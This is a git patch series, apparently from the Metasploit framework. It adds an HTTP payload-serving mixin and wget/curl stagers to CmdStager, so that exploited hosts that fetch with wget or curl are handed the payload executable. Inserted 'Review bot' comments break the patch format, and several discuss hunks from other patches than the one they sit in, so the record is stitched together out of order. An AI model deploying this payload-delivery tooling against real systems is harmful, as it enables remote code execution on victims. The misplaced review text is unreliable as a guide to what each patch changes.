From 58dd59fad53651d67cc454cddc3ac2f188a9b9d2 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Tue, 27 Dec 2016 06:59:03 -0600
Subject: [PATCH 1/4] Add Http mixin for CmdStager
---
 lib/msf/core/exploit/cmdstager/http.rb | 49 ++++++++++++++++++++++++++
 1 file changed, 49 insertions(+)
 create mode 100644 lib/msf/core/exploit/cmdstager/http.rb
diff --git a/lib/msf/core/exploit/cmdstager/http.rb b/lib/msf/core/exploit/cmdstager/http.rb
new file mode 100644
index 0000000000..9fbc1c0938
--- /dev/null
+++ b/lib/msf/core/exploit/cmdstager/http.rb
@@ -0,0 +1,49 @@
+# -*- coding: binary -*-
+
+require 'msf/core/exploit/tcp_server'
+require 'msf/core/exploit/http/server'
+
+module Msf::Exploit::CmdStager
+module Http
+
+ include Msf::Exploit::Remote::HttpServer
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Stance' => Msf::Exploit::Stance::Aggressive
+ ))
+ end
+
+ def start_service(opts = {})
+ if opts[:busybox] && (ssl = datastore['SSL'])
+ datastore['SSL'] = false
+ end
+
+ super
+ payload_uri = get_uri
+
+ if ssl
+ datastore['SSL'] = true
+ end
+
+ payload_uri
+ end
+
+ def resource_uri
+ if (datastore['URIPATH'] || '').end_with?(?/)
+ random_uri
+ else
+ super
+ end
+ end
+
+ def on_request_uri(cli, request)
+ if request['User-Agent'] =~ /^(?:Wget|curl)/
+ send_response(cli, exe)
+ else
+ send_not_found(cli)
+ end
+ end
+
+end
+end
From 34d358b8d7c9d043bf0978f4db30538f8df4f249 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Tue, 27 Dec 2016 07:00:39 -0600
Subject: [PATCH 2/4] Update CmdStager with new toys
---
 lib/msf/core/exploit/cmdstager.rb | 13 ++++++++++---
 1 file changed, 10 insertions(+), 3 deletions(-)
diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb
index c2cf9f4045..11c29a5c32 100644
--- a/lib/msf/core/exploit/cmdstager.rb
+++ b/lib/msf/core/exploit/cmdstager.rb
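Review bot: In the new `start_service`, `datastore['SSL']` is flipped off before `super` and only turned back on after `get_uri` returns, so any exception raised while the listener is being started leaves the module's SSL option at `false` for the rest of the session; PATCH 3's rewrite of `start_service` keeps the same success-only restore with `datastore_ssl`. Put `super` and `get_uri` inside a `begin`/`ensure` and move the restore into the `ensure` clause, `datastore['SSL'] = true if ssl`, so it runs on every exit. Separately, `on_request_uri` answers any request whose User-Agent matches `/^(?:Wget|curl)/` with the payload executable; that match is a convenience filter against stray browser hits rather than an access control, and a comment saying so would help, e.g. `# UA check only trims accidental browser requests; any client presenting this UA is served the payload`. The pattern would also be tighter with `\A` than `^`, which in Ruby anchors at any line start. `exe` is not defined in this file and presumably comes from the including module; a comment naming where it is expected from would save the next reader a search.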
@@ -1,8 +1,7 @@
 # -*- coding: binary -*-
 require 'rex/exploitation/cmdstager'
-require 'msf/core/exploit/exe'
-require 'msf/base/config'
+require 'msf/core/exploit/cmdstager/http'
 module Msf
@@ -10,6 +9,7 @@ module Msf
 module Exploit::CmdStager
 include Msf::Exploit::EXE
+ include Msf::Exploit::CmdStager::Http
 # Constant for stagers - used when creating an stager instance.
 STAGERS = {
@@ -21,7 +21,9 @@ module Exploit::CmdStager
 :vbs => Rex::Exploitation::CmdStagerVBS,
 :vbs_adodb => Rex::Exploitation::CmdStagerVBS,
 :certutil => Rex::Exploitation::CmdStagerCertutil,
- :tftp => Rex::Exploitation::CmdStagerTFTP
+ :tftp => Rex::Exploitation::CmdStagerTFTP,
+ :wget => Rex::Exploitation::CmdStagerWget,
+ :curl => Rex::Exploitation::CmdStagerCurl
 }
 # Constant for decoders - used when checking the default flavor decoder.
@@ -124,6 +126,11 @@ module Exploit::CmdStager
 end
 self.stager_instance = create_stager
+
+ if stager_instance.respond_to?(:http?) && stager_instance.http?
+ opts[:payload_uri] = start_service(opts)
+ end
+
 cmd_list = stager_instance.generate(opts_with_decoder(opts))
 if cmd_list.nil? || cmd_list.length.zero?
From 0321000ea72e33b0b29d352c441b9028261b4760 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Thu, 29 Dec 2016 18:20:25 -0600
Subject: [PATCH 3/4] Update Http mixin for opts[:ssl]
1. Add opts[:ssl]
2. Remove opts[:busybox]
3. Refactor logic
4. Remove resource_uri
---
 lib/msf/core/exploit/cmdstager/http.rb | 19 ++++--------------
 1 file changed, 4 insertions(+), 15 deletions(-)
diff --git a/lib/msf/core/exploit/cmdstager/http.rb b/lib/msf/core/exploit/cmdstager/http.rb
index 9fbc1c0938..3135193235 100644
--- a/lib/msf/core/exploit/cmdstager/http.rb
+++ b/lib/msf/core/exploit/cmdstager/http.rb
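Review bot: The first hunk removes `require 'msf/core/exploit/exe'` and `require 'msf/base/config'`, yet the module still does `include Msf::Exploit::EXE` (visible as context in the second hunk) and the new `cmdstager/http` file pulls in only `tcp_server` and `http/server`. Unless `Msf::Exploit::EXE` is already loaded by whatever requires this mixin, that constant now depends on load order and would raise an uninitialized-constant error when this file is loaded first; keep `require 'msf/core/exploit/exe'` alongside the new require. Whether `msf/base/config` was actually used in this file is not visible in the diff, so that removal may well be fine.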
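Review bot: In the `@@ -124` hunk the HTTP listener is started with `opts[:payload_uri] = start_service(opts)` before `generate` runs, and neither an exception from `generate` nor the empty-`cmd_list` branch that begins on the hunk's last line stops it, so a failed staging attempt can leave the service bound; the enclosing method starts and ends outside the hunk, so any later cleanup is not visible here. Consider stopping the service on those failure paths (`stop_service`, provided by the server mixin) so a module that retries does not accumulate listeners. Also note that assigning into `opts` mutates the caller's hash; if the enclosing method does not copy `opts` first, the `:payload_uri` key leaks back to the caller.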
@@ -15,28 +15,17 @@ module Http
 end
 def start_service(opts = {})
- if opts[:busybox] && (ssl = datastore['SSL'])
- datastore['SSL'] = false
- end
+ datastore_ssl = datastore['SSL']
+ datastore['SSL'] = !!opts[:ssl]
 super
- payload_uri = get_uri
- if ssl
- datastore['SSL'] = true
- end
+ payload_uri = get_uri
+ datastore['SSL'] = datastore_ssl
 payload_uri
 end
- def resource_uri
- if (datastore['URIPATH'] || '').end_with?(?/)
- random_uri
- else
- super
- end
- end
-
 def on_request_uri(cli, request)
 if request['User-Agent'] =~ /^(?:Wget|curl)/
 send_response(cli, exe)
From 36e0bad42165d38a7099fd020c4682f94428f257 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Fri, 30 Dec 2016 00:41:13 -0600
Subject: [PATCH 4/4] Update rex-exploitation to 0.1.7
---
 Gemfile.lock | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Gemfile.lock b/Gemfile.lock
index 0dcd64eb9d..ae6e9430fa 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -250,7 +250,7 @@ GEM
 metasm
 rex-arch
 rex-text
- rex-exploitation (0.1.4)
+ rex-exploitation (0.1.7)
 jsobfu
 metasm
 rex-arch
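Review bot: `start_service` now sets `datastore['SSL'] = !!opts[:ssl]`, so the stager listener is plaintext unless the caller passes `opts[:ssl]`, and the module's own `SSL` option no longer influences it; nothing in the hunk documents that, and a module author who set `SSL` would reasonably expect it to apply here. Add a comment above the assignment, e.g. `# Listener protocol is chosen by opts[:ssl] (default plaintext); the module's SSL option is saved and restored around super.` The `on_request_uri` method at the end of the hunk continues outside it.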